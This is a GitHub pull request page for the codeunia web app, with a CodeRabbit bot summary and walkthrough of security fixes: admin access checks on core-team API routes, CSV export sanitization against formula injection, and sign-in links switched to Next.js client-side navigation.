Fix/security warnings

[codeunia-dev]

Summary by CodeRabbit

• New Features
  • Added admin access gating for the Core Team admin page and related API endpoints, with loading and forbidden states.
• Bug Fixes
  • CSV exports now sanitize values to prevent spreadsheet formula injection.
  • API endpoints validate inputs and return clearer status codes (400/401/403/500).
• Refactor
  • Replaced window.location redirects with client-side navigation via Link for sign-in prompts across multiple forms, preserving button styling.
  • Minor syntax cleanup in error handling without changing behavior.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Preview	Comments	Updated (UTC)
codeunia	Building	Preview	Comment	Sep 14, 2025 4:00pm

[coderabbitai]

Caution

Review failed

The pull request is closed.

Walkthrough

Server-side admin authentication and authorization were added to the admin core team API routes and the admin page. CSV export now sanitizes fields. Several forms switched unauthenticated sign-in CTAs from window.location redirects to Next.js Link-based navigation. A bindingless catch was introduced in a username page without changing behavior.

Changes

Cohort / File(s)	Summary
Admin API auth and access control app/api/admin-core-team/route.ts	Added server-side auth helpers (SSR and service clients). Enforced admin checks in GET/POST/PATCH with 401/403 handling. Switched to service client for data ops, explicit field selection, input validation, and improved error responses.
Admin page gating and CSV sanitization app/admin/forms/core-team/page.tsx	Added useAuth-based gating (loading, forbidden). Introduced CSV value sanitization to prefix risky leading chars to prevent spreadsheet injection.
Sign-in CTA navigation refactor (forms) components/forms/collaboration-form.tsx, components/forms/core-team-form.tsx, components/forms/judges-form.tsx, components/forms/mentor-form.tsx, components/forms/sponsorship-form.tsx, components/forms/volunteer-form.tsx	Replaced window.location redirects with Next.js Link via Button asChild to navigate to /auth/signin. Imports updated accordingly; UI text unchanged.
Syntactic catch update app/[username]/page.tsx	Replaced catch (error) with bindingless catch {}; no functional change.

Sequence Diagram(s)

sequenceDiagram
  autonumber
  participant C as Client
  participant R as API Route (/api/admin-core-team)
  participant A as requireAdmin (SSR)
  participant DB as Supabase (Service Client)
  
  rect rgb(240,248,255)
    note over C,R: GET (admin list)
    C->>R: GET /api/admin-core-team
    R->>A: Validate session + is_admin
    A-->>R: 200 OK (admin) / 401 / 403
    alt Authorized
      R->>DB: select core_team_applications (fields..., order desc)
      DB-->>R: rows or error
      R-->>C: 200 rows / 500 error
    else Unauthorized
      R-->>C: 401/403
    end
  end

  rect rgb(245,255,240)
    note over C,R: POST/PATCH (update)
    C->>R: POST/PATCH with payload
    R->>A: Validate session + is_admin
    A-->>R: 200 OK (admin) / 401 / 403
    alt Authorized
      R->>R: Validate input (status/id)
      alt Valid
        R->>DB: update core_team_applications (set status/notes, updated_at)
        DB-->>R: updated row or error
        R-->>C: 200 row / 500 error
      else Invalid
        R-->>C: 400 Bad Request
      end
    else Unauthorized
      R-->>C: 401/403
    end
  end

Loading

sequenceDiagram
  autonumber
  participant U as User
  participant F as Form (unauthenticated)
  participant L as Next.js Link
  participant R as Router

  U->>F: View form (not signed in)
  F->>L: Render Button asChild with Link "/auth/signin"
  U-->>L: Click "Sign In to Continue"
  L->>R: Client-side route to /auth/signin
  R-->>U: Sign-in page

Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

Poem

I thump with cheer on admin hills,
New gates now guard the data mills.
Links hop light—no full-page fright—
To sign-in burrows, swift and bright.
CSVs de-fanged of sneaky strings,
Safe carrots counted—happy springs! 🥕✨

✨ Finishing touches

• 📝 Generate Docstrings

🧪 Generate unit tests

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch fix/security-warnings

---

📜 Recent review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 63014f9 and e72d3f2.

📒 Files selected for processing (9)

• app/[username]/page.tsx (1 hunks)
• app/admin/forms/core-team/page.tsx (4 hunks)
• app/api/admin-core-team/route.ts (3 hunks)
• components/forms/collaboration-form.tsx (2 hunks)
• components/forms/core-team-form.tsx (2 hunks)
• components/forms/judges-form.tsx (2 hunks)
• components/forms/mentor-form.tsx (2 hunks)
• components/forms/sponsorship-form.tsx (2 hunks)
• components/forms/volunteer-form.tsx (2 hunks)

Tip

👮 Agentic pre-merge checks are now available in preview!

Pro plan users can now enable pre-merge checks in their settings to enforce checklists before merging PRs.

• Built-in checks – Quickly apply ready-made checks to enforce title conventions, require pull request descriptions that follow templates, validate linked issues for compliance, and more.
• Custom agentic checks – Define your own rules using CodeRabbit’s advanced agentic capabilities to enforce organization-specific policies and workflows. For example, you can instruct CodeRabbit’s agent to verify that API documentation is updated whenever API schema files are modified in a PR. Note: Upto 5 custom checks are currently allowed during the preview period. Pricing for this feature will be announced in a few weeks.

Please see the documentation for more information.

Example:

reviews:
  pre_merge_checks:
    custom_checks:
      - name: "Undocumented Breaking Changes"
        mode: "warning"
        instructions: |
          Pass/fail criteria: All breaking changes to public APIs, CLI flags, environment variables, configuration keys, database schemas, or HTTP/GraphQL endpoints must be documented in the "Breaking Change" section of the PR description and in CHANGELOG.md. Exclude purely internal or private changes (e.g., code not exported from package entry points or explicitly marked as internal).

Please share your feedback with us on this Discord post.

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}